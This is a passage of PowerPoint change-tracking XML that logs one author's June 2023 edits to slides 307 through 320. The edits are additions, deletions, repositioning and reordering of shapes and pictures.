          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-08T13:59:40.627" v="5669" actId="1036"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3109765984" sldId="307"/>
            <ac:picMk id="5" creationId="{7DD46731-27C9-29C4-3CA6-87F8C1B9438A}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new mod ord modClrScheme chgLayout">
        <pc:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-13T04:34:59.963" v="6759" actId="207"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="548523597" sldId="308"/>
        </pc:sldMkLst>
        <pc:spChg chg="del mod ord">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-07T09:58:53.143" v="4838" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="548523597" sldId="308"/>
            <ac:spMk id="2" creationId="{CF978BE3-0015-C011-3C19-213A60152C21}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-07T09:58:53.143" v="4838" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="548523597" sldId="308"/>
            <ac:spMk id="3" creationId="{53AF9E83-7C25-EB31-56C4-A7B61A970DE7}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod ord">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-07T15:37:24.104" v="5561" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="548523597" sldId="308"/>
            <ac:spMk id="4" creationId="{CB26146F-544B-855C-E592-C5F984D06DC9}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-13T04:34:59.963" v="6759" actId="207"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="548523597" sldId="308"/>
            <ac:spMk id="6" creationId="{337CC639-C75E-F4F4-3A89-3E73AEB5DEDF}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-07T15:36:56.379" v="5511" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="548523597" sldId="308"/>
            <ac:picMk id="7" creationId="{95D3F3FC-D0F1-F519-B691-3D55C77F3824}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new mod ord modClrScheme chgLayout">
        <pc:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-09T06:11:54.072" v="6001" actId="20578"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1554322534" sldId="309"/>
        </pc:sldMkLst>
        <pc:spChg chg="del">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-07T10:07:16.529" v="4844" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1554322534" sldId="309"/>
            <ac:spMk id="2" creationId="{EB9AABBD-FFA6-1648-18CD-88D47A26AB5B}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-07T10:07:16.529" v="4844" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1554322534" sldId="309"/>
            <ac:spMk id="3" creationId="{2A38010B-A7C1-B68D-F15F-F013162CCFFE}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod ord">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-07T15:10:59.152" v="5166"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1554322534" sldId="309"/>
            <ac:spMk id="5" creationId="{0213059C-A474-0DAC-387D-D1A8BD1722CE}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-07T15:11:04.124" v="5169" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1554322534" sldId="309"/>
            <ac:picMk id="4" creationId="{9F94E95D-7A7E-EE29-E95D-4EEA5D79F5D9}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-07T14:54:21.899" v="5028" actId="2696"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="537350369" sldId="310"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="modSp add mod">
        <pc:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-07T15:31:32.302" v="5248" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2711330869" sldId="310"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-07T15:31:32.302" v="5248" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2711330869" sldId="310"/>
            <ac:spMk id="2" creationId="{D9B8522C-80B9-315F-7C05-C4536EABA46F}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add del mod">
        <pc:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-07T15:30:37.074" v="5174" actId="2696"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3321194467" sldId="310"/>
        </pc:sldMkLst>
        <pc:spChg chg="add del mod">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-07T14:54:45.989" v="5038" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3321194467" sldId="310"/>
            <ac:spMk id="5" creationId="{990E1ED2-E355-DBCE-939E-0768770BD631}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="del">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-07T14:54:44.024" v="5037" actId="21"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3321194467" sldId="310"/>
            <ac:picMk id="4" creationId="{9249EE63-AF81-C360-5D39-AB5A9FDF0076}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-07T14:54:46.355" v="5039"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3321194467" sldId="310"/>
            <ac:picMk id="6" creationId="{758C31C7-F89F-9C25-18C0-AA7DB6CDDB9A}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add del mod">
        <pc:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-07T15:30:37.074" v="5174" actId="2696"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="199259040" sldId="311"/>
        </pc:sldMkLst>
        <pc:spChg chg="add del mod">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-07T14:54:41.144" v="5035" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="199259040" sldId="311"/>
            <ac:spMk id="5" creationId="{8998A83E-A1DE-082B-52D1-D6FCFF5BBADD}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="del">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-07T14:54:38.769" v="5034" actId="21"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="199259040" sldId="311"/>
            <ac:picMk id="4" creationId="{A832E177-D634-546F-8594-5832CE63D901}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-07T14:54:41.485" v="5036"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="199259040" sldId="311"/>
            <ac:picMk id="6" creationId="{D9A74630-CAAB-2B82-4661-04A964BF036C}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp add mod">
        <pc:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-12T06:34:19.807" v="6549" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2659707195" sldId="311"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-07T15:31:36.513" v="5256" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2659707195" sldId="311"/>
            <ac:spMk id="2" creationId="{19970960-E1B7-3A58-378E-B74D372DBA38}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-07T15:32:07.241" v="5309" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2659707195" sldId="311"/>
            <ac:spMk id="3" creationId="{C21E6D22-DE36-CA0A-9A81-D7E6B3991341}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="mod">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-07T15:31:41.769" v="5258" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2659707195" sldId="311"/>
            <ac:picMk id="6" creationId="{D9A74630-CAAB-2B82-4661-04A964BF036C}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:cxnChg chg="add mod">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-12T06:34:19.807" v="6549" actId="1076"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2659707195" sldId="311"/>
            <ac:cxnSpMk id="5" creationId="{DFEED7BD-B2CF-5829-E0AD-EBBFADBA2735}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-07T14:54:21.899" v="5028" actId="2696"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2782313058" sldId="311"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add mod ord">
        <pc:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-11T07:37:02.370" v="6142"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="752188531" sldId="312"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-11T07:37:02.370" v="6142"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="752188531" sldId="312"/>
            <ac:spMk id="2" creationId="{39DEC89C-9C41-0518-4908-4422EDE2C742}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-07T14:54:35.781" v="5033" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="752188531" sldId="312"/>
            <ac:spMk id="5" creationId="{7F3427BC-30C3-2F67-8707-42B8D62522C3}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="del mod">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-07T14:54:31.848" v="5031" actId="21"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="752188531" sldId="312"/>
            <ac:picMk id="4" creationId="{03B6A60C-E9BB-2F8F-8123-D604248A6FFD}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-09T06:11:39.840" v="6000" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="752188531" sldId="312"/>
            <ac:picMk id="6" creationId="{BFA70712-E704-BB0B-26A1-C30DFAA785EB}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-07T14:54:21.899" v="5028" actId="2696"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4028775241" sldId="312"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp new mod ord modClrScheme chgLayout">
        <pc:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-07T15:11:08.529" v="5170" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2169036508" sldId="313"/>
        </pc:sldMkLst>
        <pc:spChg chg="add mod ord">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-07T14:52:24.543" v="4864" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2169036508" sldId="313"/>
            <ac:spMk id="2" creationId="{9091AF51-1651-ED27-72BB-E3665FBA1F20}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod ord">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-07T15:11:08.529" v="5170" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2169036508" sldId="313"/>
            <ac:spMk id="3" creationId="{0BD69516-968A-A1EC-AEAA-A722AEAFD3B1}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new mod">
        <pc:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-07T15:14:36.582" v="5173" actId="732"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1920737787" sldId="314"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-07T15:06:02.042" v="5127" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1920737787" sldId="314"/>
            <ac:spMk id="2" creationId="{FA64BDD7-0CFA-546C-BC37-AFF2AD283209}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-07T15:04:43.253" v="5059" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1920737787" sldId="314"/>
            <ac:spMk id="3" creationId="{6345B15F-7DB7-797B-257A-CDBA1DA66FFC}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-07T15:13:22.858" v="5172" actId="13822"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1920737787" sldId="314"/>
            <ac:spMk id="6" creationId="{8A676417-EAEF-BB8A-D614-87F618483426}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add del mod">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-07T15:09:51.265" v="5131" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1920737787" sldId="314"/>
            <ac:picMk id="4" creationId="{129E4F65-788C-E792-D38E-684F53111E6C}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod modCrop">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-07T15:14:36.582" v="5173" actId="732"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1920737787" sldId="314"/>
            <ac:picMk id="5" creationId="{306480A3-8DD8-66C3-91D7-D5998EE1F8EB}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp add mod">
        <pc:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-07T15:10:51.298" v="5164" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2694630502" sldId="315"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-07T15:10:51.298" v="5164" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2694630502" sldId="315"/>
            <ac:spMk id="2" creationId="{D9B8522C-80B9-315F-7C05-C4536EABA46F}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="mod">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-07T15:06:17.842" v="5130" actId="14100"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2694630502" sldId="315"/>
            <ac:picMk id="6" creationId="{758C31C7-F89F-9C25-18C0-AA7DB6CDDB9A}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new mod ord modAnim">
        <pc:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-12T06:40:43.578" v="6645" actId="20578"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2807702869" sldId="316"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-11T07:38:05.719" v="6219" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2807702869" sldId="316"/>
            <ac:spMk id="2" creationId="{B2DBF3FE-96E5-2C1D-4A19-D958318F514A}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-07T15:05:43.408" v="5084" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2807702869" sldId="316"/>
            <ac:spMk id="3" creationId="{ED799795-613C-732B-A803-C416F9F5A11D}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-09T06:12:23.186" v="6004" actId="122"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2807702869" sldId="316"/>
            <ac:spMk id="4" creationId="{0FDB879D-8A1B-B314-133D-ED967FBCB4ED}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-09T06:12:39.080" v="6007" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2807702869" sldId="316"/>
            <ac:picMk id="5" creationId="{42606DA3-7EE6-7596-4F65-A3A90A12278D}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp new mod ord modAnim">
        <pc:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-13T04:17:34.341" v="6758" actId="20578"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3868642818" sldId="317"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-07T17:30:50.561" v="5591" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3868642818" sldId="317"/>
            <ac:spMk id="2" creationId="{6CAD19FF-EACC-8349-BF95-A8902C9E9336}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-09T06:00:40.774" v="5751" actId="122"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3868642818" sldId="317"/>
            <ac:spMk id="4" creationId="{C9A6C085-E8EA-4215-CDB8-73E35B673074}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-09T06:00:02.110" v="5748" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3868642818" sldId="317"/>
            <ac:picMk id="3" creationId="{813B2B20-A173-4068-A3B4-0FC7951CDA5C}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp mod">
        <pc:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-11T07:36:45.371" v="6141"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1423290170" sldId="318"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-08T13:58:43.501" v="5634" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1423290170" sldId="318"/>
            <ac:spMk id="2" creationId="{2045698B-21F3-9300-21E7-B823738F5273}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-11T07:36:45.371" v="6141"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1423290170" sldId="318"/>
            <ac:spMk id="3" creationId="{3AC184D8-9432-0073-E565-DE6B02F165E5}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new del mod">
        <pc:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-08T10:00:38.444" v="5630" actId="2696"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2075432502" sldId="318"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-08T10:00:17.485" v="5625" actId="5793"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2075432502" sldId="318"/>
            <ac:spMk id="2" creationId="{2DF6B393-BDC9-B10C-55EF-C5EE58BC4325}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-08T10:00:01.785" v="5594" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2075432502" sldId="318"/>
            <ac:spMk id="3" creationId="{4BFF57BE-59A6-C39A-C28F-08FF0CAE99FF}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add del mod">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-08T10:00:28.077" v="5627" actId="21"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2075432502" sldId="318"/>
            <ac:picMk id="4" creationId="{45C69946-85CA-5243-107A-B75E6CA21EF5}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new mod">
        <pc:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-09T06:09:56.469" v="5899" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="853415426" sldId="320"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-09T06:08:44.160" v="5895" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="853415426" sldId="320"/>
            <ac:spMk id="2" creationId="{39CE0A2B-B173-623A-6B26-6DFB300E565F}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
